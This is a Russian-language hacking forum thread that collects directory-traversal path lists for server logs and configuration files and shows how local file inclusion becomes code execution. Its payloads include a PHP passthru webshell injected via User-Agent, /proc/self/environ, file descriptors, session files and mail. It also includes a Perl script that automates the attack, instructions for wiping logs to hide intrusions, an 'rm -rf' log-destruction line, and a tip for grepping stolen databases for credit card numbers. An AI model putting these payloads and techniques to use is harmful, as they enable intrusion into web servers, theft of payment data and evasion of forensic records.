Apache:
*log
../../../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/error_log
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../apache2/logs/error.log
../apache2/logs/access.log
../../apache2/logs/error.log
../../apache2/logs/access.log
../../../apache2/logs/error.log
../../../apache2/logs/access.log
../../../../apache2/logs/error.log
../../../../apache2/logs/access.log
../../../../../apache2/logs/error.log
../../../../../apache2/logs/access.log
../logs/error.log
../logs/access.log
../../logs/error.log
../../logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../usr/local/apache2/logs/access_log
../../../../../../../../../../usr/local/apache2/logs/access.log
../../../../../../../../../../usr/local/apache2/logs/error_log
../../../../../../../../../../usr/local/apache2/logs/error.log
../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../var/log/httpd/access_log
../../../../../../../../../../var/log/httpd/access.log
../../../../../../../../../../var/log/httpd/error_log
../../../../../../../../../../var/log/httpd/error.log
../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../var/log/apache2/access_log
../../../../../../../../../../var/log/apache2/access.log
../../../../../../../../../../var/log/apache2/error_log
../../../../../../../../../../var/log/apache2/error.log
../../../../../../../../../../var/log/access_log
../../../../../../../../../../var/log/access.log
../../../../../../../../../../var/log/error_log
../../../../../../../../../../var/log/error.log
../../../../../../../../../../opt/lampp/logs/access_log
../../../../../../../../../../opt/lampp/logs/error_log
../../../../../../../../../../opt/xampp/logs/access_log
../../../../../../../../../../opt/xampp/logs/error_log
../../../../../../../../../../opt/lampp/logs/access.log
../../../../../../../../../../opt/lampp/logs/error.log
../../../../../../../../../../opt/xampp/logs/access.log
../../../../../../../../../../opt/xampp/logs/error.log
../../../../../../../../../../Program Files\Apache Group\Apache\logs\access.log
../../../../../../../../../../Program Files\Apache Group\Apache\logs\error.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../apache/logs/error.log
../../../../apache/logs/access.log
../../../../../apache/logs/error.log
../../../../../apache/logs/access.log
../../../../../../apache/logs/error.log
../../../../../../apache/logs/access.log
../../../../../../../apache/logs/error.log
../../../../../../../apache/logs/access.log
../../../../../../../../apache/logs/error.log
../../../../../../../../apache/logs/access.log
../../../logs/error.log
../../../logs/access.log
../../../../logs/error.log
../../../../logs/access.log
../../../../../logs/error.log
../../../../../logs/access.log
../../../../../../logs/error.log
../../../../../../logs/access.log
../../../../../../../logs/error.log
../../../../../../../logs/access.log
../../../../../../../../logs/error.log
../../../../../../../../logs/access.log
../../../../../../../../../../../../etc/httpd/logs/acces_log
../../../../../../../../../../../../etc/httpd/logs/acces.log
../../../../../../../../../../../../etc/httpd/logs/error_log
../../../../../../../../../../../../etc/httpd/logs/error.log
../../../../../../../../../../../../var/www/logs/access_log
../../../../../../../../../../../../var/www/logs/access.log
../../../../../../../../../../../../usr/local/apache/logs/access_log
../../../../../../../../../../../../usr/local/apache/logs/access.log
../../../../../../../../../../../../var/log/apache/access_log
../../../../../../../../../../../../var/log/apache/access.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/www/logs/error_log
../../../../../../../../../../../../var/www/logs/error.log
../../../../../../../../../../../../usr/local/apache/logs/error_log
../../../../../../../../../../../../usr/local/apache/logs/error.log
../../../../../../../../../../../../var/log/apache/error_log
../../../../../../../../../../../../var/log/apache/error.log
../../../../../../../../../../../../var/log/access_log
../../../../../../../../../../../../var/log/error_log
*conf

../../../../../../usr/local/apache/conf/httpd.conf
../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/apache/conf/httpd.conf
../../../../../../usr/local/etc/apache/conf/httpd.conf
../../../../../../etc/apache2/httpd.conf
../../../../../../../../../usr/local/apache/conf/httpd.conf
../../../../../../../../../usr/local/apache2/conf/httpd.conf
../../../../../../../../usr/local/apache/httpd.conf
../../../../../../../../usr/local/apache2/httpd.conf
../../../../../../../../usr/local/httpd/conf/httpd.conf
../../../../../../../usr/local/etc/apache/conf/httpd.conf
../../../../../../../usr/local/etc/apache2/conf/httpd.conf
../../../../../../../usr/local/etc/httpd/conf/httpd.conf
../../../../../../../usr/apache2/conf/httpd.conf
../../../../../../../usr/apache/conf/httpd.conf
../../../../../../../usr/local/apps/apache2/conf/httpd.conf
../../../../../../../usr/local/apps/apache/conf/httpd.conf
../../../../../../etc/apache/conf/httpd.conf
../../../../../../etc/apache2/conf/httpd.conf
../../../../../../etc/httpd/conf/httpd.conf
../../../../../../etc/http/conf/httpd.conf
../../../../../../etc/apache2/httpd.conf
../../../../../../etc/httpd/httpd.conf
../../../../../../etc/http/httpd.conf
../../../../../../etc/httpd.conf
../../../../../opt/apache/conf/httpd.conf
../../../../../opt/apache2/conf/httpd.conf
../../../../var/www/conf/httpd.conf
../../../private/etc/httpd/httpd.conf
../../../private/etc/httpd/httpd.conf.default
../../Volumes/webBackup/opt/apache2/conf/httpd.conf
../../Volumes/webBackup/private/etc/httpd/httpd.conf
../../Volumes/webBackup/private/etc/httpd/httpd.conf.default
../../../../../../../../../Program Files\Apache Group\Apache\conf\httpd.conf
../../../../../../../../../Program Files\Apache Group\Apache2\conf\httpd.conf
../../../../../../../../../Program Files\xampp\apache\conf\httpd.conf
../../../../../../../../../usr/local/php/httpd.conf.php
../../../../../../../../../usr/local/php4/httpd.conf.php
../../../../../../../../../usr/local/php5/httpd.conf.php
../../../../../../../../../usr/local/php/httpd.conf
../../../../../../../../../usr/local/php4/httpd.conf
../../../../../../../../../usr/local/php5/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/httpd/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/opt/apache2/conf/httpd.conf
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php4/httpd.conf.php
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php5/httpd.conf.php
/usr/local/etc/apache/vhosts.conf

php.ini../../../../../../../../../etc/php.ini
../../../../../../../../../bin/php.ini
../../../../../../../../../etc/httpd/php.ini
../../../../../../../../../usr/lib/php.ini
../../../../../../../../../usr/lib/php/php.ini
../../../../../../../../../usr/local/etc/php.ini
../../../../../../../../../usr/local/lib/php.ini
../../../../../../../../../usr/local/php/lib/php.ini
../../../../../../../../../usr/local/php4/lib/php.ini
../../../../../../../../../usr/local/php5/lib/php.ini
../../../../../../../../../usr/local/apache/conf/php.ini
../../../../../../../../../etc/php4.4/fcgi/php.ini
../../../../../../../../../etc/php4/apache/php.ini
../../../../../../../../../etc/php4/apache2/php.ini
../../../../../../../../../etc/php5/apache/php.ini
../../../../../../../../../etc/php5/apache2/php.ini
../../../../../../../../../etc/php/php.ini
../../../../../../../../../etc/php/php4/php.ini
../../../../../../../../../etc/php/apache/php.ini
../../../../../../../../../etc/php/apache2/php.ini
../../../../../../../../../web/conf/php.ini
../../../../../../../../../usr/local/Zend/etc/php.ini
../../../../../../../../../opt/xampp/etc/php.ini
../../../../../../../../../var/local/www/conf/php.ini
../../../../../../../../../etc/php/cgi/php.ini
../../../../../../../../../etc/php4/cgi/php.ini
../../../../../../../../../etc/php5/cgi/php.ini
../../../../../../../../../php5\php.ini
../../../../../../../../../php4\php.ini
../../../../../../../../../php\php.ini
../../../../../../../../../PHP\php.ini
../../../../../../../../../WINDOWS\php.ini
../../../../../../../../../WINNT\php.ini
../../../../../../../../../apache\php\php.ini
../../../../../../../../../xampp\apache\bin\php.ini
../../../../../../../../../NetServer\bin\stable\apache\php.ini
../../../../../../../../../home2\bin\stable\apache\php.ini
../../../../../../../../../home\bin\stable\apache\php.ini
../../../../../../../../../Volumes/Macintosh_HD1/usr/local/php/lib/php.ini

Cpanel:
*log
/usr/local/cpanel/logs
/usr/local/cpanel/logs/stats_log
/usr/local/cpanel/logs/access_log
/usr/local/cpanel/logs/error_log
/usr/local/cpanel/logs/license_log
/usr/local/cpanel/logs/login_log
/usr/local/cpanel/logs/stats_log
*conf
/var/cpanel/cpanel.config

MySQL:
*log
/var/log/mysql/mysql-bin.log
/var/log/mysql.log
/var/log/mysqlderror.log
/var/log/mysql/mysql.log
/var/log/mysql/mysql-slow.log
/var/mysql.log
*conf
/var/lib/mysql/my.cnf
/etc/mysql/my.cnf
/etc/my.cnf

MySQL(Windows):
*log
C:\Program Files\MySQL\MySQL Server 5.0\data\hostname.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.log
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql.err
C:\Program Files\MySQL\MySQL Server 5.0\data\mysql-bin.log
C:\Program Files\MySQL\data\hostname.err
C:\Program Files\MySQL\data\mysql.log
C:\Program Files\MySQL\data\mysql.err
C:\Program Files\MySQL\data\mysql-bin.log
C:\MySQL\data\hostname.err
C:\MySQL\data\mysql.log
C:\MySQL\data\mysql.err
C:\MySQL\data\mysql-bin.log
*conf
C:\Program Files\MySQL\MySQL Server 5.0\my.ini
C:\Program Files\MySQL\MySQL Server 5.0\my.cnf
C:\Program Files\MySQL\my.ini
C:\Program Files\MySQL\my.cnf
C:\MySQL\my.ini
C:\MySQL\my.cnf

Mod Security:
*log
/usr/local/apache/logs/audit_log
/logs/security_debug_log
/logs/security_log
*conf
/usr/local/apache/conf/modsec.conf


FTP:

ProFTPD:
*log
/etc/logrotate.d/proftpd
/www/logs/proftpd.system.log
/var/log/proftpd
*conf
/etc/proftp.conf
/etc/protpd/proftpd.conf
/etc/vhcs2/proftpd/proftpd.conf
/etc/proftpd/modules.conf

vsftpd:
*log
/var/log/vsftpd.log
/etc/vsftpd.chroot_list
/etc/logrotate.d/vsftpd.log
*conf
/etc/vsftpd/vsftpd.conf
/etc/vsftpd.conf
/etc/chrootUsers

wu-ftpd:
*log
/var/log/xferlog
/var/adm/log/xferlog
*conf
/etc/wu-ftpd/ftpaccess
/etc/wu-ftpd/ftphosts
/etc/wu-ftpd/ftpusers

Pure-FTPd:
*conf
/usr/sbin/pure-config.pl
/usr/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.conf
/usr/local/etc/pure-ftpd.conf
/usr/local/etc/pureftpd.pdb
/usr/local/pureftpd/etc/pureftpd.pdb
/usr/local/pureftpd/sbin/pure-config.pl
/usr/local/pureftpd/etc/pure-ftpd.conf
-/etc/pure-ftpd.conf
/etc/pure-ftpd/pure-ftpd.pdb
/etc/pureftpd.pdb
/etc/pureftpd.passwd
/etc/pure-ftpd/pureftpd.pdb
DragonflyBSD & FreeBSD: /usr/ports/ftp/pure-ftpd/
OpenBSD: /usr/ports/net/pure-ftpd/
NetBSD: /usr/pkgsrc/net/pureftpd/
Crux Linux: /usr/ports/contrib/pure-ftpd/
*log
/var/log/pure-ftpd/pure-ftpd.log
/logs/pure-ftpd.log
/var/log/pureftpd.log

Other:
/var/log/ftp-proxy/ftp-proxy.log
/var/log/ftp-proxy
/var/log/ftplog
/etc/logrotate.d/ftp
/etc/ftpchroot
/etc/ftphosts


Mail server:
Exim:
*log
/var/log/exim_mainlog
/var/log/exim/mainlog
/var/log/maillog
/var/log/exim_paniclog
/var/log/exim/paniclog
/var/log/exim/rejectlog
/var/log/exim_rejectlog

Информация к размышлению:

/usr/bin/grep
Grep по своей сути - поиск шаблона в файле. Нередко его используют в конвейере для поиска шаблона, например cat /etc/passwd | grep root, хотя можно было бы обойтись командой grep root /etc/passwd. У grep также есть замечательные опции, которыми можно воспользоваться:
grep -v string file - выведет все строки, которые содержат string. Отсюда приходит мысль: чистка логов обойдется всего лишь в 2 команды (убираем все строки из /var/log/messages содержащие ip-адрес 127.0.0.1) # grep -v '127.0.0.1' /var/log/messages > /var/log/mess; mv /var/log/mess /var/log/messages
Все обходится без специальных логвайперов (кстати, оные тоже юзают grep -v).
grep -r - рекурсивный поиск. С опцией -E, выводящей все совпадения прямо на экран можно поискать Credit Cards на заломанной машине. Слюнки потекли? Показываю как:
# grep -iEr visa /var/lib/mysql >/tmp/cc.log 2>&1
Записываем все совпадения в /tmp/cc.log.

- Выполнение команд через локальный инклюд (http://forum.antichat.ru/showthread.php?p=400021)
- Логи для умных (http://www.xakep.ru/magazine/xs/047/084/1.asp)
- ЗАМЕТАЕМ СЛЕДЫ В LINUX (http://www.xakep.ru/magazine/xs/032/062/1.asp)
- Скажи логам нет! (http://www.xakep.ru/magazine/xa/069/080/1.asp)
- В борьбе с журнальными бестиями (http://www.xakep.ru/magazine/xa/078/100/1.asp)
- Боремся с логами в *nix (http://www.xakep.ru/post/13097/default.asp)
- Боремся с логами в *nix #2 (http://www.xakep.ru/post/13122/default.asp)
- Бортжурнал юниксоида (http://www.xakep.ru/magazine/xa/063/108/1.asp)
- О взломе лог файлов (http://forum.antichat.ru/showpost.php?p=98140&postcount=1)
thx [53x]Shadow

В аттаче - элементарная утилитка для проверки GET инклудов.

Если у вас есть РАСПРОСТРАНЕННЫЙ ПУТЬ отстуствующий в списке - запостите его.

Значит, помниццо были разговоры про то что при инклуде логов возникают проблемы и т.п.

В error_log часто пишется "Referer".

В access_log - "User-Agent".

И касательно мифа по тому что символы < > кодируюццо в URL аналоги и "ничего не сделаешь" - запустите любой http-снифер и вы увидите, что это браузер виноват - он автоматом переводит символы в урл.
Просто пошлите пакет любой тулзой типа AccessDriver.

...


../../../../../../usr/local/apache/bin/httpd
../../../../../../../../../usr/local/apache/conf/httpd.conf.default
../../../../../../../../etc/httpd/logs/access_log
../../../../../../../../etc/httpd/logs/access.log
../../../../../../../../../usr/local/apache/conf/access.conf

MuddleFTPD

*log
/var/log/muddleftpd
/usr/sbin/mudlogd
/etc/muddleftpd/mudlog
*conf
/etc/muddleftpd.com
/etc/muddleftpd/mudlogd.conf
/etc/muddleftpd/muddleftpd.conf
/var/log/muddleftpd.conf
/usr/sbin/mudpasswd
/etc/muddleftpd/muddleftpd.passwd
/etc/muddleftpd/passwd

В большенстве случаев сервер под управлением Win NT хранит свои лог файлы в следующих директориях:

HTTP:
%SystemRoot%\system32\logfiles\W3SVC#(W3SVC1,W3SVC 2,W3SVC3...)\
FTP:
%SystemRoot%\system32\logfiles\MSFTPSVC#(MSFTPSVC4 ,MSFTPSVC5...)\
SMTP:
%SystemRoot%\system32\logfiles\SMTPSVC#(SMTPSVC1,S MTPSVC2...)\

# -обозначает номер веб-сайта(номер узла) (по умолчанию равен "1")

Имя файла соответствует его дате создания: in02039.log (2002 9-ое марта)

Примечание по типам журнулов:
IIS аббревиатурой служит "in"
W3C аббревиатурой служит "ex"
NCSA аббревиатурой служит "nc"

Отчёты стандартного Firewall'а:
%SystemRoot%\system32\logfiles\Firewall\pfirewall. log
%SystemRoot%\system32\logfiles\Firewall\pfirewall. log.old

lighthttpd
*log
/var/log/lighttpd.error.log
/var/log/lighttpd.access.log
/var/lighttpd.log
/var/logs/access.log
/var/log/lighttpd/
/var/log/lighttpd/error.log
/var/log/lighttpd/access.www.log
/var/log/lighttpd/error.www.log
/var/log/lighttpd/access.log
/usr/local/apache2/logs/lighttpd.error.log
/usr/local/apache2/logs/lighttpd.log
/usr/local/apache/logs/lighttpd.error.log
/usr/local/apache/logs/lighttpd.log
/var/log/lighttpd.access.log
/var/log/lighttpd.error.log
/usr/local/lighttpd/log/lighttpd.error.log
/usr/local/lighttpd/log/access.log
/var/log/lighttpd/mydomain/access.log
/var/log/lighttpd/mydomain/error.log
/usr/home/user/var/log/lighttpd.error.log
/usr/home/user/var/log/apache.log

*conf
/home/user/lighttpd/lighttpd.conf
/usr/home/user/lighttpd/lighttpd.conf
/etc/lighttpd/lighthttpd.conf
/usr/local/etc/lighttpd.conf
/usr/local/lighttpd/conf/lighttpd.conf
/usr/local/etc/lighttpd.conf.new
/var/www/.lighttpdpassword

Samba
*conf
/etc/smbpasswd
/etc/smb.conf
/etc/samba/smb.conf
/etc/samba/samba.conf
/etc/samba/smb.conf.user
/etc/samba/smbpasswd
/etc/samba/smbusers
/etc/samba/private/smbpasswd
/etc/samba/smb.conf.198.166.0.5
/usr/local/samba/lib/smb.conf.198.166.0.5
/usr/local/etc/smb.conf
/usr/local/samba/lib/smb.conf.user
/daten/home/gr-user



*log
/usr/local/samba/lib/log.user
/usr/local/logs/samba.log
/usr/local/samba/lib/log.198.166.0.5
/var/log/samba/log.smbd
/var/log/samba/log.nmbd
/var/log/samba.log
/var/log/samba.log1
/var/log/samba.log2
/var/log/samba/samba_198.166.0.5.log
/var/log/samba/198.166.0.5.log
/var/log/samba.198.166.0.5
/var/log/samba.log.198.166.0.5
/var/log/samba/198.166.0.5
/var/log/log.smb
/var/log/samba-log.198.166.0.5
/etc/samba/netlogon

PostgreSQL

*log
/var/postgresql/log/postgresql.log
/var/log/postgresql/postgresql.log
/var/log/postgres/pg_backup.log
/var/log/postgres/postgres.log
/var/log/postgresql.log
/var/log/pgsql/pgsql.log
/var/log/postgresql/postgresql-8.1-main.log
/var/log/pgsql8.log
/var/log/postgresql/postgres.log
/var/log/pgsql_log
/var/log/postgresql/main.log
/var/log/cron /var/log/postgres.log
/usr/internet/pgsql/data/postmaster.log
/usr/local/pgsql/data/postgresql.log
/usr/local/pgsql/data/pg_log
c:\PostgreSQL\log\pgadmin.log

*conf
/var/lib/pgsql/data/postgresql.conf
/var/postgresql/db/postgresql.conf
/var/nm2/postgresql.conf
/usr/local/pgsql/data/postgresql.conf
/usr/local/pgsql/data/pg_hba.conf
/usr/internet/pgsql/data/pg_hba.conf
/usr/local/pgsql/data/passwd
/usr/local/pgsql/bin/pg_passwd
/etc/postgresql/postgresql.conf
/etc/postgresql/pg_hba.conf
/home/postgres/data/postgresql.conf
/home/postgres/data/PG_VERSION
/home/postgres/data/pg_ident.conf
/home/postgres/data/pg_hba.conf

Error Reporting and Logging (http://postgresql.mirrors-r-us.net/docs/8.2/static/runtime-config-logging.html)

ipfw (BSD)

*log
/var/log/ipfw.log
/var/log/ipfw
/var/log/ipfw/ipfw.log
/var/log/ipfw.today


*conf
/etc/ipfw.rules
/etc/ipfw.conf
/etc/firewall.rules

*обновление постов.

Структура архива:
_all_apache.log.txt
_all_httpd.conf.txt
_all_log.txt -LAMPP, XAMPP, Apache.
_all_php.ini.txt
_all_mysql.txt
_all_mysql_win.txt
_all_cpanel.txt
_all_modsecurity.txt
_all_ftp.txt -ProFTPD, vsftpd, wu-ftpd,Pure-FTPd, MuddleFTPD.
_all_samba.txt
_all_lighthttpd.txt
_all_postgresq.txt

1) юзаем логи, не зная к ним пути

a. /proc/%{PID}/fd/%{FD_ID}

%{PID} - пид
%{FD_ID} - ярлыки, (1,2,3,..,9) 2 и 7 логи апача (не факт что всегда, у меня были тоже 2 и 7)

/proc/self/status - смотрим пид
/proc/%{PID}/fd/%{FD_ID} -> /proc/3661/fd/2

index.php?inc=../../../../../proc/3661/fd/2
User-Agent: <?php passthru($_GET['cmd']) ?>

dr-x------ 2 www-data www-data 0 Jan 2 18:27 .
dr-xr-xr-x 6 www-data www-data 0 Jan 2 18:27 ..
lr-x------ 1 www-data www-data 64 Jan 2 18:27 0 -> /dev/null
l-wx------ 1 www-data www-data 64 Jan 2 18:27 1 -> pipe:[3113414]
l-wx------ 1 www-data www-data 64 Jan 2 18:27 2 -> /var/log/apache2/error.log
lrwx------ 1 www-data www-data 64 Jan 2 18:27 3 -> socket:[2714910]
lr-x------ 1 www-data www-data 64 Jan 2 18:27 4 -> pipe:[2714921]
l-wx------ 1 www-data www-data 64 Jan 2 18:27 5 -> pipe:[2714921]
l-wx------ 1 www-data www-data 64 Jan 2 18:27 6 -> /var/log/apache2/access.log
lrwx------ 1 www-data www-data 64 Jan 2 18:27 7 -> /anon_inode:[eventpoll]
lrwx------ 1 www-data www-data 64 Jan 2 18:27 8 -> socket:[2742717]
lr-x------ 1 www-data www-data 64 Jan 2 18:27 9 -> /proc/27262/fd

b. напрямую
index.php?inc=../../../../../proc/self/fd/2
User-Agent: <?php passthru($_GET['cmd']) ?>

2) переменные окружения (если неправильно понял - поправьте)
index.php?inc=../../../../../proc/self/environ
POST:
User-Agent: <?php passthru($_GET['cmd']) ?>

3) mail
<?
mail("ololo@localhost", "<?php passthru(\$_GET['cmd']) ?>", "fuckme");
?>

index.php?inc=../../../../../var/mail/ololo
index.php?inc=../../../../../var/spool/mail/ololo


зы.
/proc/version
/proc/self/cmdline
/proc/devices


по мотивам
http://www.ush.it/2008/08/18/lfi2rce-local-file-inclusion-to-remote-code-execution-advanced-exploitation-proc-shortcuts/
http://www.milw0rm.com/papers/260
http://itbloggen.se/cs/blogs/secteam/archive/2009/01/26/alternative-ways-to-exploit-PHP-remote-file-include-vulnerabilities.aspx

Скрипт для поиска путей логов Apache

#! /usr/bin/perl

# perl script to serach apache logs path
# Example:
# URL: http://site/index.php
# Variable: file
# Method: POST
#
# by Pepelux (pepelux[at]enye-sec[dot]org)

use LWP::UserAgent;
$ua = LWP::UserAgent->new;

my ($host, $var, $method) = @ARGV ;

unless($ARGV[2]) {
print "Usage: perl $0 <url> <vulnerable_var> <method>\n";
print "\tex: perl $0 http://site.com/index.php file GET\n";
print "\tex: perl $0 http://site.com/index.php file POST\n\n";
exit 1;
}

$ua->agent("<? passthru(\$_GET[cmd]) ?>");
$ua->timeout(10);
$host = "http://".$host if ($host !~ /^http:/);

if ($method =~ /GET/) {
$url = $host."?".$var."=../../../../proc/self/stat%00";
$req = HTTP::Request->new(GET => $url);
$req->header('Accept' => 'text/html');
}
else {
$req = HTTP::Request->new(POST => $host);
$req->content_type('application/x-www-form-urlencoded');
$req->content($var."=../../../../proc/self/stat%00");
}

$res = $ua->request($req);

if ($res->is_success) {
$result = $res->content;
$result =~ s/<[^>]*>//g;
$x = index($result, " ", 0);
$pid = substr($result, 0, $x);

print "Apache PID: ".$pid."\n";
}

if ($method =~ /GET/) {
$url = $host."?".$var."=../../../../proc/self/status%00";
$req = HTTP::Request->new(GET => $url);
$req->header('Accept' => 'text/html');
}
else {
$req = HTTP::Request->new(POST => $host);
$req->content_type('application/x-www-form-urlencoded');
$req->content($var."=../../../../proc/self/status%00");
}

$res = $ua->request($req);

if ($res->is_success) {
$result = $res->content;
$result =~ s/<[^>]*>//g;
$x = index($result, "FDSize",0)+8;
$fdsize = substr($result, $x, 3);

print "FD_SIZE: ".$fdsize."\n";
}

for ($cont = 0; $cont < $fdsize; $cont++) {
$file = "../../../../proc/".$pid."/fd/".$cont;
open FILE, $file;

while(<FILE>) {
if (($_ =~ /does not exist/) && ($_ =~ /passthru/)) {
print "FD: ".$cont."\n";
exit;
}
}
}

немного проверил то что c411k написал - mail файл доступен только юзеру чей mail, так что чтоб прочитать нужен и апач под тем же юзером, всяким www,nobody,apache запрещается по дефолту иметь ящик,
/proc/self/environ у меня пустой , не знаю как будет при php в cgi моде, лог файлы да читаются на ура только если прав хватит, проверил на других хостах - только рут может логи читать (, потом еще через файл сессии можно инклуд сделать у меня он находится в /proc/self/fd/10

Рассмотрим ситуацию, когда уникальному пользователю присваивается SID (Session IDentifier) идентификатор, без какой либо фильтрации входящего содержимого,
Независимо от его способа передачи(Cookie/Query string), на сервере будет создан "файл сеанса", при условии что session.save_handler соответствует значение files, в каталоге определенной директивой session.save_path. Главным плюсом является то, что обслуживание хостов на сервере будет производится одним процессом.

Session.save_path:
/tmp/sess_<session_id>
/php_sess/sess_<session_id>
/tmp/php-sess/sess_<session_id>
/home/%username%/tmp/sess_<session_id>

../../../../tmp/sess_7083093d3b1e818d5c86c79b0f62a374&cmd=id

osx

httpd conf
/etc/osxhttpd/osxhttpd.conf
/System/Library/WebObjects/Adaptors/Apache2.2/apache.conf

osx site conf
/etc/apache2/sites/*.conf"
/etc/httpd/sites/000[1...]__[PORT]_[SITE_NAME].conf

Пример: 0002_18.80.2.252_80_meche.mit.edu.conf

[I]default site dir
/Library/WebServer/Documents/

Webmin

conf
/usr/local/etc/webmin/miniserv.conf
/etc/webmin/miniserv.conf
/usr/local/etc/webmin/miniserv.users
/etc/webmin/miniserv.users

log
/var/log/webmin/miniserv.log

SquirrelMail


*log
/usr/share/squirrelmail/plugins/squirrel_logger/setup.php
$sl_logfile = "/var/log/squirrelmail.log";

/var/log/apache2/squirrelmail.log
/var/log/apache2/squirrelmail.err.log
/var/lib/squirrelmail/prefs/squirrelmail.log
/var/log/squirrelmail.log
/var/log/mail.log

ls:
#ls /usr/local/squirrelmail/www/
AUTHORS configure doc include plugins src
ChangeLog contrib functions index.php po themes
class COPYING help INSTALL README UPGRADE
config data images locale ReleaseNotes

# ls /var/local/squirrelmail/
attach data

# ls /etc/squirrelmail/
apache.conf config_local.php default_pref index.php
config_default.php config.php filters_setup.php sqspell_config.php

*conf
/etc/squirrelmail/config/config.php
/etc/squirrelmail/config.php
/etc/httpd/conf.d/squirrelmail.conf
/usr/share/squirrelmail/config/config.php
/private/etc/squirrelmail/config/config.php
/srv/www/htdos/squirrelmail/config/config.php
/var/www/squirrelmail/config/config.php
/var/www/html/squirrelmail/config/config.php
/var/www/html/squirrelmail[Version]/config/config.php (/var/www/html/squirrelmail-1.2.9/config/config.php)

Plugin
/etc/squirrelmail/plugins
/usr/share/squirrelmail/plugins

/usr/share/squirrelmail/config/config.php
$plugins[1] = 'squirrel_logger';
$plugins[2]
...

насколько я понял выполнить код через /proc/self/environ получиться только если php работает как cgi, иначе /proc/self/environ будет указываеть на окружение апача. Проверить легко, если в /proc/self/cmdline что-то вроде
/usr/sbin/apache2�-k�start�
то php не cgi и код внедрить в /proc/self/environ не получиться.

Небольшое дополнение к материалу предоставленному c411k

1 На фре это работать не будет. там немного по другому всё устроено и по умолчанию proc/ не используется.

2 Через пиды искать логи бесполезно, да и не нужно, дело в том, что
proc/self/
это как раз ссылка на каталог с данными процесса, а
proc/self/fd
в свою очередь дирректория содержащая ссылки на файлы которые использует процесс. Так-что всё проще.

=============================

И так-же по дефолтным логам добывлю из своих наблюдений

На Апаче 2.2.x частенько попадаются директории
apache22/ т.е.
../../../../../../usr/local/apache22/conf/httpd.conf
../../../../../../usr/local/apache22/httpd.conf
../../../../../../usr/local/etc/apache22/conf/httpd.conf
../../../../../../usr/local/apps/apache22/conf/httpd.conf
../../../../../../etc/apache22/conf/httpd.conf
../../../../../../etc/apache22/httpd.conf
../../../../../../opt/apache22/conf/httpd.conf
и т.д.

nginx

*.conf:
../../../../../../etc/nginx/srv.d/*.conf
../../../../../../etc/nginx/nginx.conf
../../../../../../usr/local/etc/nginx/nginx.conf
../../../../../../usr/local/nginx/conf/nginx.conf

logs:
../../../../../../var/log/nginx/access_log
../../../../../../var/log/nginx/error_log
../../../../../../var/log/nginx/access.log
../../../../../../var/log/nginx/error.log
../../../../../../var/log/nginx.access_log
../../../../../../var/log/nginx.error_log

../../../../../../logs/access_log
../../../../../../logs/error_log
../../../../../../logs/access.log
../../../../../../logs/error.log

../../../../../../var/www/<domain.com>/log/nginx.access.log
../../../../../../var/www/<domain.com>/log/nginx.error.log
../../../../../../var/www/<domain.com>/log/nginx.access_log
../../../../../../var/www/<domain.com>/log/nginx.error_log

../../../../../../var/log/nginx/<domain.com>.access.log
../../../../../../var/log/nginx/<domain.com>.error.log
../../../../../../var/log/nginx/<domain.com>_access.log
../../../../../../var/log/nginx/<domain.com>_error.log

/root/.bash_logut



rm -rf /var/run/utmp rm -rf /var/logs
rm -rf /var/log rm -rf /var/adm rm -rf /etc/wtmp
rm -rf /etc/utmp find / -name *.bash_history -exec

не надо так чистить, копипаст непроверенный )

Сори, хотел исправить пост, а нажал делит) Выкладываю еще раз.


IRIX:

/var/adm/SYSLOG
/var/adm/sulog
/var/adm/utmp
/var/adm/utmpx
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/lastlog/username
/usr/spool/lp/log
/var/adm/lp/lpd-errs
/usr/lib/cron/log
/var/adm/loginlog
/var/adm/pacct
/var/adm/dtmp
/var/adm/acct/sum/loginlog
/var/adm/X0msgs
/var/adm/crash/vmcore
/var/adm/crash/unix

AIX:

/var/adm/pacct
/var/adm/wtmp
/var/adm/dtmp
/var/adm/qacct
/var/adm/sulog
/var/adm/ras/errlog
/var/adm/ras/bootlog
/var/adm/cron/log
/etc/utmp
/etc/security/lastlog
/etc/security/failedlogin
/usr/spool/mqueue/syslog

SunOS:

/var/adm/messages
/var/adm/aculogs
/var/adm/aculog
/var/adm/sulog
/var/adm/vold.log
/var/adm/wtmp
/var/adm/wtmpx
/var/adm/utmp
/var/adm/utmpx
/var/adm/log/asppp.log
/var/log/syslog
/var/log/POPlog
/var/log/authlog
/var/adm/pacct
/var/lp/logs/lpsched
/var/lp/logs/lpNet
/var/lp/logs/requests
/var/cron/log
/var/saf/_log
/var/saf/port/log

Linux:

/var/log/lastlog
/var/log/telnetd
